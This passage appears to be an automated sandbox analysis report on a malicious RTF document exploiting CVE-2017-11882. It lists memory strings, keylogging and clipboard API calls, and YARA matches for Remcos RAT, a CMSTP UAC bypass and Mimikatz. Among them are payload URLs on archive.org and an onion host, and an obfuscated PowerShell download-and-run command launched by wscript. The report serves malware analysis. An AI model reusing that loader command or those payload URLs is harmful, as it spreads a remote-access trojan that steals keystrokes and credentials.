                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.378441374.00000000008C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000000E.00000002.378106098.000000000034C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/HK
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://www.msn.com/
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: RegAsm.exe, 0000000B.00000002.380657934.0000000000374000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net0
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: powershell.exe, 00000007.00000002.364796787.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.org
                  Source: powershell.exe, 00000005.00000002.369133356.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.org/download/new_image_vbs/new_imaLR
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://archive.org/download/new_image_vbs/new_image_vbs.jpg
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_im
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 0000000B.00000002.381064244.00000000025C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv5928.tmp.11.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000008_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A41B
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

                  System Summary

                  barindex
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9122
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9122Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
